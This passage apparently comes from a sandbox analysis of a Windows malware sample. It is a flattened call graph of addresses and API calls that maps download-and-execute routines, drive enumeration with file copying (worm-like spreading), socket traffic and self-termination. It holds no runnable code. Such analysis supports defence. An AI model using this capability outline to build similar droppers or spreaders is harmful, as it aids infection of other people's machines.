calls 4600->4603 4600->4622 4602 40cae3 4601->4602 4604 40a240 7 API calls 4602->4604 4605 40cba2 4603->4605 4606 40caf2 4604->4606 4607 40a240 7 API calls 4605->4607 4608 4024e0 10 API calls 4606->4608 4609 40cbb1 4607->4609 4610 40cb1b 4608->4610 4611 4024e0 10 API calls 4609->4611 4613 40a660 _invalid_parameter 3 API calls 4610->4613 4612 40cbda 4611->4612 4614 40a660 _invalid_parameter 3 API calls 4612->4614 4615 40cb27 4613->4615 4617 40cbe6 4614->4617 4616 402420 7 API calls 4615->4616 4618 40cb38 4616->4618 4619 402420 7 API calls 4617->4619 4620 4024e0 10 API calls 4618->4620 4621 40cbf7 4619->4621 4620->4622 4623 4024e0 10 API calls 4621->4623 4622->4566 4624 40cc11 4623->4624 4625 402420 7 API calls 4624->4625 4626 40cc22 4625->4626 4627 4024e0 10 API calls 4626->4627 4627->4622 4639 40a260 4628->4639 4631 402420 4660 40a450 4631->4660 4636 4024e0 4667 402540 4636->4667 4638 4024ff __aligned_recalloc_base 4638->4581 4648 40a300 GetCurrentProcessId 4639->4648 4641 40a26b 4642 40a277 _invalid_parameter 4641->4642 4649 40a320 4641->4649 4644 40a24e 4642->4644 4645 40a292 HeapAlloc 4642->4645 4644->4589 4644->4631 4645->4644 4646 40a2b9 _invalid_parameter 4645->4646 4646->4644 4647 40a2d4 memset 4646->4647 4647->4644 4648->4641 4657 40a300 GetCurrentProcessId 4649->4657 4651 40a329 4652 40a346 HeapCreate 4651->4652 4658 40a390 GetProcessHeaps 4651->4658 4654 40a360 HeapSetInformation GetCurrentProcessId 4652->4654 4655 40a387 4652->4655 4654->4655 4655->4642 4657->4651 4659 40a33c 4658->4659 4659->4652 4659->4655 4661 40a260 _invalid_parameter 7 API calls 4660->4661 4662 40242b 4661->4662 4663 402820 4662->4663 4664 40282a 4663->4664 4665 40a450 _invalid_parameter 7 API calls 4664->4665 4666 402438 4665->4666 4666->4636 4668 40258e 4667->4668 4670 402551 4667->4670 4669 40a450 _invalid_parameter 7 API calls 4668->4669 4668->4670 4673 4025b2 _invalid_parameter 4669->4673 4670->4638 4671 4025e2 memcpy 4672 402606 _invalid_parameter 4671->4672 4674 40a660 _invalid_parameter 3 API calls 4672->4674 4673->4671 4677 40a660 4673->4677 4674->4670 4684 40a300 GetCurrentProcessId 4677->4684 4679 40a66b 4680 4025df 4679->4680 4685 40a5a0 4679->4685 4680->4671 4683 40a687 HeapFree 4683->4680 4684->4679 4686 40a5d0 HeapValidate 4685->4686 4687 40a5f0 4685->4687 4686->4687 4687->4680 4687->4683 4705 40a6d0 4688->4705 4691 40cd11 4691->4472 4694 40a660 _invalid_parameter 3 API calls 4694->4691 4918 40a490 4695->4918 4698 405cca memcpy 4699 40a6d0 8 API calls 4698->4699 4700 405d01 4699->4700 4928 40c640 4700->4928 4703 405d88 4703->4472 4706 40a6fd 4705->4706 4707 40a450 _invalid_parameter 7 API calls 4706->4707 4708 40a712 4706->4708 4709 40a714 memcpy 4706->4709 4707->4706 4708->4691 4710 40c1e0 4708->4710 4709->4706 4712 40c1ea 4710->4712 4714 40c221 memcmp 4712->4714 4715 40c248 4712->4715 4716 40a660 _invalid_parameter 3 API calls 4712->4716 4718 40c209 4712->4718 4719 40c6d0 4712->4719 4733 407fa0 4712->4733 4714->4712 4717 40a660 _invalid_parameter 3 API calls 4715->4717 4716->4712 4717->4718 4718->4691 4718->4694 4720 40c6df _invalid_parameter 4719->4720 4721 40a450 _invalid_parameter 7 API calls 4720->4721 4723 40c6e9 4720->4723 4722 40c778 4721->4722 4722->4723 4724 402420 7 API calls 4722->4724 4723->4712 4725 40c78d 4724->4725 4726 402420 7 API calls 4725->4726 4727 40c795 4726->4727 4729 40c7ed _invalid_parameter 4727->4729 4736 40c840 4727->4736 4741 402470 4729->4741 4732 402470 3 API calls 4732->4723 4849 40a1c0 4733->4849 4737 4024e0 10 API calls 4736->4737 4738 40c854 4737->4738 4747 4026f0 4738->4747 4740 40c86c 4740->4727 4742 402484 _invalid_parameter 4741->4742 4744 4024ce 4741->4744 4745 40a660 _invalid_parameter 3 API calls 4742->4745 4746 4024ac 4742->4746 4743 40a660 _invalid_parameter 3 API calls 4743->4744 4744->4732 4745->4746 4746->4743 4750 402710 4747->4750 4749 40270a 4749->4740 4751 402724 4750->4751 4752 402540 __aligned_recalloc_base 10 API calls 4751->4752 4753 40276d 4752->4753 4754 402540 __aligned_recalloc_base 10 API calls 4753->4754 4755 40277d 4754->4755 4756 402540 __aligned_recalloc_base 10 API calls 4755->4756 4757 40278d 4756->4757 4758 402540 __aligned_recalloc_base 10 API calls 4757->4758 4759 40279d 4758->4759 4760 4027a6 4759->4760 4761 4027cf 4759->4761 4765 403e20 4760->4765 4782 403df0 4761->4782 4764 4027c7 __aligned_recalloc_base 4764->4749 4766 402820 _invalid_parameter 7 API calls 4765->4766 4767 403e37 4766->4767 4768 402820 _invalid_parameter 7 API calls 4767->4768 4769 403e46 4768->4769 4770 402820 _invalid_parameter 7 API calls 4769->4770 4771 403e55 4770->4771 4772 402820 _invalid_parameter 7 API calls 4771->4772 4781 403e64 _invalid_parameter __aligned_recalloc_base 4772->4781 4774 40400f _invalid_parameter 4775 402850 _invalid_parameter 3 API calls 4774->4775 4776 404035 _invalid_parameter 4774->4776 4775->4774 4777 402850 _invalid_parameter 3 API calls 4776->4777 4778 40405b _invalid_parameter 4776->4778 4777->4776 4779 402850 _invalid_parameter 3 API calls 4778->4779 4780 404081 4778->4780 4779->4778 4780->4764 4781->4774 4785 402850 4781->4785 4789 404090 4782->4789 4784 403e0c 4784->4764 4786 402866 4785->4786 4787 40285b 4785->4787 4786->4781 4788 40a660 _invalid_parameter 3 API calls 4787->4788 4788->4786 4790 4040a6 _invalid_parameter 4789->4790 4791 4040b8 _invalid_parameter 4790->4791 4792 4040dd 4790->4792 4794 404103 4790->4794 4791->4784 4819 403ca0 4792->4819 4795 40413d 4794->4795 4796 40415e 4794->4796 4829 404680 4795->4829 4798 402820 _invalid_parameter 7 API calls 4796->4798 4799 40416f 4798->4799 4800 402820 _invalid_parameter 7 API calls 4799->4800 4801 40417e 4800->4801 4802 402820 _invalid_parameter 7 API calls 4801->4802 4803 40418d 4802->4803 4804 402820 _invalid_parameter 7 API calls 4803->4804 4805 40419c 4804->4805 4842 403d70 4805->4842 4807 4041ca _invalid_parameter 4808 402820 _invalid_parameter 7 API calls 4807->4808 4810 404284 _invalid_parameter __aligned_recalloc_base 4807->4810 4808->4807 4809 402850 _invalid_parameter 3 API calls 4809->4810 4810->4809 4811 4045a3 _invalid_parameter 4810->4811 4812 402850 _invalid_parameter 3 API calls 4811->4812 4813 4045c9 _invalid_parameter 4811->4813 4812->4811 4814 402850 _invalid_parameter 3 API calls 4813->4814 4815 4045ef _invalid_parameter 4813->4815 4814->4813 4816 402850 _invalid_parameter 3 API calls 4815->4816 4817 404615 _invalid_parameter 4815->4817 4816->4815 4817->4791 4818 402850 _invalid_parameter 3 API calls 4817->4818 4818->4817 4820 403cae 4819->4820 4821 402820 _invalid_parameter 7 API calls 4820->4821 4822 403ccb 4821->4822 4823 402820 _invalid_parameter 7 API calls 4822->4823 4824 403cda _invalid_parameter 4823->4824 4825 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4824->4825 4826 403d3a _invalid_parameter 4824->4826 4825->4824 4827 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4826->4827 4828 403d60 4826->4828 4827->4826 4828->4791 4830 402820 _invalid_parameter 7 API calls 4829->4830 4831 404697 4830->4831 4832 402820 _invalid_parameter 7 API calls 4831->4832 4833 4046a6 4832->4833 4834 402820 _invalid_parameter 7 API calls 4833->4834 4836 4046b5 _invalid_parameter __aligned_recalloc_base 4834->4836 4835 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4835->4836 4836->4835 4837 404841 _invalid_parameter 4836->4837 4838 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4837->4838 4840 404867 _invalid_parameter 4837->4840 4838->4837 4839 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4839->4840 4840->4839 4841 40488d 4840->4841 4841->4791 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 403d7f _invalid_parameter 4843->4844 4845 403ca0 _invalid_parameter 9 API calls 4844->4845 4847 403db8 _invalid_parameter 4845->4847 4846 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4846->4847 4847->4846 4848 403de3 4847->4848 4848->4807 4850 40a1d2 4849->4850 4853 40a120 4850->4853 4854 40a450 _invalid_parameter 7 API calls 4853->4854 4861 40a130 4854->4861 4857 40a660 _invalid_parameter 3 API calls 4859 407fbf 4857->4859 4858 40a16c 4858->4857 4859->4712 4861->4858 4861->4859 4862 409650 4861->4862 4869 409c40 4861->4869 4874 40a010 4861->4874 4863 409663 4862->4863 4868 409659 4862->4868 4864 4096a6 memset 4863->4864 4863->4868 4865 4096c7 4864->4865 4864->4868 4866 4096cd memcpy 4865->4866 4865->4868 4882 409420 4866->4882 4868->4861 4870 409c4d 4869->4870 4871 409c57 4869->4871 4870->4861 4871->4870 4872 409d4f memcpy 4871->4872 4887 409970 4871->4887 4872->4871 4876 40a026 4874->4876 4880 40a01c 4874->4880 4875 409970 64 API calls 4877 40a0a7 4875->4877 4876->4875 4876->4880 4878 409420 6 API calls 4877->4878 4877->4880 4879 40a0c6 4878->4879 4879->4880 4881 40a0db memcpy 4879->4881 4880->4861 4881->4880 4883 40946e 4882->4883 4885 40942e 4882->4885 4883->4868 4885->4883 4886 409360 6 API calls 4885->4886 4886->4885 4888 409980 4887->4888 4889 40998a 4887->4889 4888->4871 4889->4888 4897 4097b0 4889->4897 4892 409ac8 memcpy 4892->4888 4894 409ae7 memcpy 4895 409c11 4894->4895 4896 409970 62 API calls 4895->4896 4896->4888 4898 4097bd 4897->4898 4900 4097c7 4897->4900 4898->4888 4898->4892 4898->4894 4899 409850 4908 409110 4899->4908 4900->4898 4900->4899 4902 409855 4900->4902 4903 409838 4900->4903 4904 409420 6 API calls 4902->4904 4906 409420 6 API calls 4903->4906 4904->4899 4906->4899 4907 4098fc memset 4907->4898 4909 409129 4908->4909 4917 40911f 4908->4917 4910 408fe0 9 API calls 4909->4910 4909->4917 4911 409222 4910->4911 4912 40a450 _invalid_parameter 7 API calls 4911->4912 4913 409271 4912->4913 4914 408e50 46 API calls 4913->4914 4913->4917 4915 40929e 4914->4915 4916 40a660 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4916 4916->4917 4917->4898 4917->4907 4937 40a300 GetCurrentProcessId 4918->4937 4920 40a49b 4921 40a320 _invalid_parameter 5 API calls 4920->4921 4922 40a4a7 _invalid_parameter 4920->4922 4921->4922 4923 40a550 HeapAlloc 4922->4923 4924 40a51a HeapReAlloc 4922->4924 4925 40a5a0 _invalid_parameter HeapValidate 4922->4925 4926 40a660 _invalid_parameter 3 API calls 4922->4926 4927 405cb5 4922->4927 4923->4922 4924->4922 4925->4922 4926->4922 4927->4698 4927->4703 4931 40c64b 4928->4931 4929 40a450 _invalid_parameter 7 API calls 4929->4931 4930 405d4d 4930->4703 4932 4072a0 4930->4932 4931->4929 4931->4930 4933 40a450 _invalid_parameter 7 API calls 4932->4933 4934 4072b0 4933->4934 4935 4072f7 4934->4935 4936 4072bc memcpy CreateThread CloseHandle 4934->4936 4935->4703 4936->4935 4938 407300 4936->4938 4937->4920 4939 407371 4938->4939 4940 407311 4938->4940 4941 40737c DeleteUrlCacheEntry 4939->4941 4944 40736f 4939->4944 4943 407320 StrChrA 4940->4943 4940->4944 4947 407344 DeleteUrlCacheEntry 4940->4947 4945 40ef90 64 API calls 4941->4945 4942 40a660 _invalid_parameter 3 API calls 4946 4073a6 4942->4946 4943->4940 4943->4947 4944->4942 4945->4944 4950 40ef90 9 API calls 4947->4950 4951 40f053 InternetOpenUrlW 4950->4951 4952 40f1be InternetCloseHandle Sleep 4950->4952 4953 40f1b1 InternetCloseHandle 4951->4953 4954 40f082 CreateFileW 4951->4954 4955 40f1e5 7 API calls 4952->4955 4956 407359 Sleep 4952->4956 4953->4952 4957 40f0b1 InternetReadFile 4954->4957 4958 40f1a4 CloseHandle 4954->4958 4955->4956 4959 40f274 wsprintfW DeleteFileW Sleep 4955->4959 4956->4940 4960 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4957->4960 4961 40f0d5 4957->4961 4958->4953 4962 40ec70 21 API calls 4959->4962 4978 40ec70 CreateFileW 4960->4978 4961->4960 4963 40f0de WriteFile 4961->4963 4965 40f2b4 4962->4965 4963->4957 4967 40f2f2 DeleteFileW 4965->4967 4968 40f2be Sleep 4965->4968 4967->4956 4971 40ee30 6 API calls 4968->4971 4969 40f197 DeleteFileW 4969->4958 4970 40f15b Sleep 4972 40ee30 6 API calls 4970->4972 4973 40f2d5 4971->4973 4974 40f172 4972->4974 4973->4956 4976 40f2e8 ExitProcess 4973->4976 4975 40f18e 4974->4975 4977 40f186 ExitProcess 4974->4977 4975->4958 4979 40ecb5 CreateFileMappingW 4978->4979 4980 40edca 4978->4980 4981 40edc0 CloseHandle 4979->4981 4982 40ecd6 MapViewOfFile 4979->4982 4983 40edd0 CreateFileW 4980->4983 4992 40ee21 4980->4992 4981->4980 4984 40ecf5 GetFileSize 4982->4984 4985 40edb6 CloseHandle 4982->4985 4986 40edf2 WriteFile CloseHandle 4983->4986 4987 40ee18 4983->4987 4988 40ed11 4984->4988 4989 40edac UnmapViewOfFile 4984->4989 4985->4981 4986->4987 4990 40a660 _invalid_parameter 3 API calls 4987->4990 5000 40cca0 4988->5000 4989->4985 4990->4992 4992->4969 4992->4970 4994 40c640 7 API calls 4995 40ed60 4994->4995 4995->4989 4996 40ed7d memcmp 4995->4996 4996->4989 4997 40ed99 4996->4997 4998 40a660 _invalid_parameter 3 API calls 4997->4998 4999 40eda2 4998->4999 4999->4989 5001 40c6d0 10 API calls 5000->5001 5002 40ccc4 5001->5002 5002->4989 5002->4994 5004 40dbed htons inet_addr setsockopt 5003->5004 5009 40dd1e 5003->5009 5005 40af30 8 API calls 5004->5005 5006 40dc66 bind lstrlenA sendto ioctlsocket 5005->5006 5012 40dcbb 5006->5012 5009->4485 5010 40dce2 5060 40aff0 shutdown closesocket 5010->5060 5011 40a490 9 API calls 5011->5012 5012->5010 5012->5011 5051 40dd40 5012->5051 5067 40e070 memset InternetCrackUrlA InternetOpenA 5013->5067 5016 40df4e 5016->4485 5018 40a660 _invalid_parameter 3 API calls 5018->5016 5022 40df1b 5022->5018 5025 40df11 SysFreeString 5025->5022 5174 40aef0 inet_addr 5028->5174 5031 40afdd 5036 40e920 5031->5036 5032 40af8c connect 5033 40afa0 getsockname 5032->5033 5034 40afd4 5032->5034 5033->5034 5177 40aff0 shutdown closesocket 5034->5177 5178 40aed0 inet_ntoa 5036->5178 5038 40e936 5039 40cea0 11 API calls 5038->5039 5040 40e955 5039->5040 5046 40db7c 5040->5046 5179 40e9a0 memset InternetCrackUrlA InternetOpenA 5040->5179 5043 40e98c 5045 40a660 _invalid_parameter 3 API calls 5043->5045 5044 40a660 _invalid_parameter 3 API calls 5044->5043 5045->5046 5046->4490 5050 40a784 5047->5050 5048 40a78a 5048->4480 5049 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5049->5050 5050->5048 5050->5049 5059 40dd5c 5051->5059 5052 40de24 5052->5012 5053 40dd78 recvfrom 5054 40dda6 StrCmpNIA 5053->5054 5055 40dd99 Sleep 5053->5055 5056 40ddc5 StrStrIA 5054->5056 5054->5059 5055->5059 5057 40dde6 StrChrA 5056->5057 5056->5059 5061 40cd50 5057->5061 5059->5052 5059->5053 5060->5009 5062 40cd5b 5061->5062 5063 40cd61 lstrlenA 5062->5063 5064 40a450 _invalid_parameter 7 API calls 5062->5064 5065 40cd74 5062->5065 5066 40cd90 memcpy 5062->5066 5063->5062 5063->5065 5064->5062 5065->5059 5066->5062 5066->5065 5068 40e111 InternetConnectA 5067->5068 5069 40de4a 5067->5069 5070 40e27a InternetCloseHandle 5068->5070 5071 40e14a HttpOpenRequestA 5068->5071 5069->5016 5080 40df60 5069->5080 5070->5069 5072 40e180 HttpSendRequestA 5071->5072 5073 40e26d InternetCloseHandle 5071->5073 5074 40e260 InternetCloseHandle 5072->5074 5076 40e19d 5072->5076 5073->5070 5074->5073 5075 40e1be InternetReadFile 5075->5076 5077 40e1eb 5075->5077 5076->5075 5076->5077 5078 40a490 9 API calls 5076->5078 5077->5074 5079 40e206 memcpy 5078->5079 5079->5076 5109 405630 5080->5109 5083 40de63 5083->5022 5090 40e8d0 5083->5090 5084 40df8a SysAllocString 5085 40dfa1 CoCreateInstance 5084->5085 5086 40e057 5084->5086 5088 40e04d SysFreeString 5085->5088 5089 40dfc6 5085->5089 5087 40a660 _invalid_parameter 3 API calls 5086->5087 5087->5083 5088->5086 5089->5088 5126 40e420 5090->5126 5093 40e2a0 5131 40e6f0 5093->5131 5098 40e850 6 API calls 5099 40e2f7 5098->5099 5105 40dee2 5099->5105 5148 40e510 5099->5148 5102 40e32f 5102->5105 5153 40e3c0 5102->5153 5103 40e510 6 API calls 5103->5102 5105->5025 5106 40cea0 5105->5106 5169 40ce10 5106->5169 5113 40563d 5109->5113 5110 405643 lstrlenA 5110->5113 5115 405656 5110->5115 5112 40a450 _invalid_parameter 7 API calls 5112->5113 5113->5110 5113->5112 5113->5115 5116 40a660 _invalid_parameter 3 API calls 5113->5116 5117 4055d0 5113->5117 5121 405580 5113->5121 5115->5083 5115->5084 5116->5113 5118 4055e7 MultiByteToWideChar 5117->5118 5119 4055da lstrlenA 5117->5119 5120 40560c 5118->5120 5119->5118 5120->5113 5122 40558b 5121->5122 5123 405591 lstrlenA 5122->5123 5124 4055d0 2 API calls 5122->5124 5125 4055c7 5122->5125 5123->5122 5124->5122 5125->5113 5129 40e446 5126->5129 5127 40decd 5127->5022 5127->5093 5128 40e4c3 lstrcmpiW 5128->5129 5130 40e4db SysFreeString 5128->5130 5129->5127 5129->5128 5129->5130 5130->5129 5132 40e716 5131->5132 5133 40e2bb 5132->5133 5134 40e7a3 lstrcmpiW 5132->5134 5133->5105 5143 40e850 5133->5143 5135 40e823 SysFreeString 5134->5135 5136 40e7b6 5134->5136 5135->5133 5137 40e3c0 2 API calls 5136->5137 5139 40e7c4 5137->5139 5138 40e815 5138->5135 5139->5135 5139->5138 5140 40e7f3 lstrcmpiW 5139->5140 5141 40e805 5140->5141 5142 40e80b SysFreeString 5140->5142 5141->5142 5142->5138 5144 40e3c0 2 API calls 5143->5144 5146 40e86b 5144->5146 5145 40e2d9 5145->5098 5145->5105 5146->5145 5147 40e6f0 6 API calls 5146->5147 5147->5145 5149 40e3c0 2 API calls 5148->5149 5151 40e52b 5149->5151 5150 40e315 5150->5102 5150->5103 5151->5150 5157 40e590 5151->5157 5154 40e3e6 5153->5154 5155 40e3fd 5154->5155 5156 40e420 2 API calls 5154->5156 5155->5105 5156->5155 5159 40e5b6 5157->5159 5158 40e6cd 5158->5150 5159->5158 5160 40e643 lstrcmpiW 5159->5160 5161 40e6c3 SysFreeString 5160->5161 5162 40e656 5160->5162 5161->5158 5163 40e3c0 2 API calls 5162->5163 5165 40e664 5163->5165 5164 40e6b5 5164->5161 5165->5161 5165->5164 5166 40e693 lstrcmpiW 5165->5166 5167 40e6a5 5166->5167 5168 40e6ab SysFreeString 5166->5168 5167->5168 5168->5164 5173 40ce1d 5169->5173 5170 40cdc0 _vscprintf wvsprintfA 5170->5173 5171 40ce38 SysFreeString 5171->5025 5172 40a490 9 API calls 5172->5173 5173->5170 5173->5171 5173->5172 5175 40af1c socket 5174->5175 5176 40af09 gethostbyname 5174->5176 5175->5031 5175->5032 5176->5175 5177->5031 5178->5038 5180 40e977 5179->5180 5181 40ea44 InternetConnectA 5179->5181 5180->5043 5180->5044 5182 40ebc4 InternetCloseHandle 5181->5182 5183 40ea7d HttpOpenRequestA 5181->5183 5182->5180 5184 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5183->5184 5185 40ebb7 InternetCloseHandle 5183->5185 5186 40ebaa InternetCloseHandle 5184->5186 5189 40eafd 5184->5189 5185->5182 5186->5185 5187 40eb14 InternetReadFile 5188 40eb41 5187->5188 5187->5189 5188->5186 5189->5187 5189->5188 5190 40a490 9 API calls 5189->5190 5191 40eb5c memcpy 5190->5191 5191->5189 5198 406ff7 5192->5198 5193 407250 CoCreateInstance 5193->5198 5194 4071cb 5196 4071d4 SysFreeString 5194->5196 5197 406f9b SysFreeString 5194->5197 5195 40a660 _invalid_parameter 3 API calls 5195->5194 5196->5197 5197->4493 5198->5193 5199 407146 SysAllocString 5198->5199 5200 407012 5198->5200 5199->5198 5199->5200 5200->5194 5200->5195 5202 40c37a 5201->5202 5203 40c37e 5201->5203 5202->4499 5205 40c330 CryptAcquireContextW 5203->5205 5206 40c36b 5205->5206 5207 40c34d CryptGenRandom CryptReleaseContext 5205->5207 5206->5202 5207->5206 5208->4512 5260 40b280 gethostname 5209->5260 5212 40b369 5212->4512 5214 40b37c strcmp 5214->5212 5215 40b391 5214->5215 5264 40aed0 inet_ntoa 5215->5264 5217 40b39f strstr 5218 40b3f0 5217->5218 5219 40b3af 5217->5219 5267 40aed0 inet_ntoa 5218->5267 5265 40aed0 inet_ntoa 5219->5265 5222 40b3bd strstr 5222->5212 5224 40b3cd 5222->5224 5223 40b3fe strstr 5225 40b40e 5223->5225 5226 40b44f 5223->5226 5266 40aed0 inet_ntoa 5224->5266 5268 40aed0 inet_ntoa 5225->5268 5270 40aed0 inet_ntoa 5226->5270 5230 40b45d strstr 5233 40b46d 5230->5233 5234 40b4ae EnterCriticalSection 5230->5234 5231 40b3db strstr 5231->5212 5231->5218 5232 40b41c strstr 5232->5212 5235 40b42c 5232->5235 5271 40aed0 inet_ntoa 5233->5271 5237 40b4c6 5234->5237 5269 40aed0 inet_ntoa 5235->5269 5245 40b4f1 5237->5245 5273 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5237->5273 5239 40b43a strstr 5239->5212 5239->5226 5240 40b47b strstr 5240->5212 5241 40b48b 5240->5241 5272 40aed0 inet_ntoa 5241->5272 5244 40b5ea LeaveCriticalSection 5244->5212 5245->5244 5247 40a240 7 API calls 5245->5247 5246 40b499 strstr 5246->5212 5246->5234 5248 40b535 5247->5248 5248->5244 5274 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5248->5274 5250 40b553 5251 40b580 5250->5251 5252 40b576 Sleep 5250->5252 5254 40b5a5 5250->5254 5253 40a660 _invalid_parameter 3 API calls 5251->5253 5252->5250 5253->5254 5254->5244 5275 40b030 5254->5275 5256->4527 5258 40b030 14 API calls 5257->5258 5259 40b023 LeaveCriticalSection 5258->5259 5259->4519 5261 40b2a7 gethostbyname 5260->5261 5262 40b2c3 5260->5262 5261->5262 5262->5212 5263 40aed0 inet_ntoa 5262->5263 5263->5214 5264->5217 5265->5222 5266->5231 5267->5223 5268->5232 5269->5239 5270->5230 5271->5240 5272->5246 5273->5245 5274->5250 5276 40b044 5275->5276 5277 40b03f 5275->5277 5278 40a450 _invalid_parameter 7 API calls 5276->5278 5277->5244 5280 40b058 5278->5280 5279 40b0b4 CreateFileW 5281 40b103 InterlockedExchange 5279->5281 5282 40b0d7 WriteFile FlushFileBuffers CloseHandle 5279->5282 5280->5277 5280->5279 5283 40a660 _invalid_parameter 3 API calls 5281->5283 5282->5281 5283->5277 5285 40d70d 5284->5285 5286 40d643 5285->5286 5287 40d731 WaitForSingleObject 5285->5287 5286->4534 5286->4535 5287->5285 5288 40d74c CloseHandle 5287->5288 5288->5285 5290 405829 memset GetModuleHandleW 5289->5290 5291 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5290->5291 5291->5291 5292 4058a0 CreateWindowExW 5291->5292 5293 4058cb 5292->5293 5294 4058cd GetMessageA 5292->5294 5295 4058ff ExitThread 5293->5295 5296 4058e1 TranslateMessage DispatchMessageA 5294->5296 5297 4058f7 5294->5297 5296->5294 5297->5290 5297->5295 5319 40ec20 CreateFileW 5298->5319 5300 406cd8 ExitThread 5302 406b80 5302->5300 5303 406cc8 Sleep 5302->5303 5304 406bb9 5302->5304 5322 406340 GetLogicalDrives 5302->5322 5303->5302 5328 406260 5304->5328 5307 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5308 406c66 wsprintfW 5307->5308 5309 406c7b wsprintfW 5307->5309 5308->5309 5334 406650 _chkstk 5309->5334 5310 406beb 5315 407407 5312->5315 5313 4074e1 Sleep 5313->5315 5314 40742f Sleep 5314->5315 5315->5313 5315->5314 5316 40745e Sleep wsprintfA DeleteUrlCacheEntry 5315->5316 5318 40ef90 64 API calls 5315->5318 5387 40eee0 InternetOpenA 5316->5387 5318->5315 5320 40ec68 5319->5320 5321 40ec4f GetFileSize CloseHandle 5319->5321 5320->5302 5321->5320 5327 40636d 5322->5327 5323 4063e6 5323->5302 5324 40637c RegOpenKeyExW 5325 40639e RegQueryValueExW 5324->5325 5324->5327 5326 4063da RegCloseKey 5325->5326 5325->5327 5326->5327 5327->5323 5327->5324 5327->5326 5329 4062b9 5328->5329 5330 40627c 5328->5330 5329->5307 5329->5310 5369 4062c0 GetDriveTypeW 5330->5369 5333 4062ab lstrcpyW 5333->5329 5335 406667 5334->5335 5336 40666e 6 API calls 5334->5336 5335->5310 5337 406722 5336->5337 5338 406764 PathFileExistsW 5336->5338 5341 40ec20 3 API calls 5337->5341 5339 406803 PathFileExistsW 5338->5339 5340 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5338->5340 5344 406814 5339->5344 5345 406859 FindFirstFileW 5339->5345 5342 4067a9 CreateDirectoryW 5340->5342 5343 4067cb PathFileExistsW 5340->5343 5346 40672e 5341->5346 5342->5343 5348 4067bc SetFileAttributesW 5342->5348 5343->5339 5349 4067dc CopyFileW 5343->5349 5350 406834 5344->5350 5351 40681c 5344->5351 5345->5335 5362 406880 5345->5362 5346->5338 5347 406745 SetFileAttributesW DeleteFileW 5346->5347 5347->5338 5348->5343 5349->5339 5353 4067f4 SetFileAttributesW 5349->5353 5355 406400 3 API calls 5350->5355 5374 406400 CoInitialize CoCreateInstance 5351->5374 5352 406942 lstrcmpW 5356 406958 lstrcmpW 5352->5356 5352->5362 5353->5339 5357 40682f SetFileAttributesW 5355->5357 5356->5362 5357->5345 5359 406b19 FindNextFileW 5359->5352 5360 406b35 FindClose 5359->5360 5360->5335 5361 40699e lstrcmpiW 5361->5362 5362->5352 5362->5359 5362->5361 5363 406a05 PathMatchSpecW 5362->5363 5365 406a83 PathFileExistsW 5362->5365 5378 406510 CreateDirectoryW wsprintfW FindFirstFileW 5362->5378 5363->5362 5364 406a26 wsprintfW SetFileAttributesW DeleteFileW 5363->5364 5364->5362 5365->5362 5366 406a99 wsprintfW wsprintfW 5365->5366 5366->5362 5367 406b03 MoveFileExW 5366->5367 5367->5359 5370 40629f 5369->5370 5371 4062e8 5369->5371 5370->5329 5370->5333 5371->5370 5372 4062fc QueryDosDeviceW 5371->5372 5372->5370 5373 406316 StrCmpNW 5372->5373 5373->5370 5375 406436 5374->5375 5377 406472 5374->5377 5376 406440 wsprintfW 5375->5376 5375->5377 5376->5377 5377->5357 5379 406565 lstrcmpW 5378->5379 5380 40663f 5378->5380 5381 406591 5379->5381 5382 40657b lstrcmpW 5379->5382 5380->5362 5384 40660c FindNextFileW 5381->5384 5382->5381 5383 406593 wsprintfW wsprintfW 5382->5383 5383->5381 5385 4065f6 MoveFileExW 5383->5385 5384->5379 5386 406628 FindClose RemoveDirectoryW 5384->5386 5385->5384 5386->5380 5388 40ef06 InternetOpenUrlA 5387->5388 5389 40ef78 Sleep 5387->5389 5390 40ef25 HttpQueryInfoA 5388->5390 5391 40ef6e InternetCloseHandle 5388->5391 5389->5315 5392 40ef64 InternetCloseHandle 5390->5392 5393 40ef4e 5390->5393 5391->5389 5392->5391 5393->5392 5394 40cf40 5399 40b1f0 5394->5399 5398 40cf6a 5400 40b280 2 API calls 5399->5400 5401 40b1ff 5400->5401 5402 40b209 5401->5402 5403 40b20d EnterCriticalSection 5401->5403 5402->5398 5406 40cf80 InterlockedExchangeAdd 5402->5406 5404 40b22c LeaveCriticalSection 5403->5404 5404->5402 5407 40cf96 5406->5407 5408 40cf9d 5406->5408 5407->5398 5423 40d270 5408->5423 5411 40cfbd InterlockedIncrement 5420 40cfc7 5411->5420 5413 40cff0 5433 40aed0 inet_ntoa 5413->5433 5415 40cffc 5417 40d0c0 InterlockedDecrement 5415->5417 5416 40d1a0 6 API calls 5416->5420 5448 40aff0 shutdown closesocket 5417->5448 5419 40a450 _invalid_parameter 7 API calls 5419->5420 5420->5413 5420->5416 5420->5417 5420->5419 5421 40a660 _invalid_parameter 3 API calls 5420->5421 5430 40b9d0 5420->5430 5434 40ba20 5420->5434 5421->5420 5424 40d27d socket 5423->5424 5425 40d292 htons connect 5424->5425 5426 40d2ef 5424->5426 5425->5426 5427 40d2da 5425->5427 5426->5424 5428 40cfad 5426->5428 5449 40aff0 shutdown closesocket 5427->5449 5428->5407 5428->5411 5450 40b930 5430->5450 5433->5415 5444 40ba31 5434->5444 5436 40ba4f 5438 40a660 _invalid_parameter 3 API calls 5436->5438 5439 40bdff 5438->5439 5439->5420 5440 40be10 21 API calls 5440->5444 5443 40b9d0 13 API calls 5443->5444 5444->5436 5444->5440 5444->5443 5445 40b330 32 API calls 5444->5445 5458 40bf60 5444->5458 5465 40b700 EnterCriticalSection 5444->5465 5470 406e20 5444->5470 5475 406ec0 5444->5475 5480 406cf0 5444->5480 5487 406df0 5444->5487 5445->5444 5448->5407 5449->5428 5451 40c3b0 3 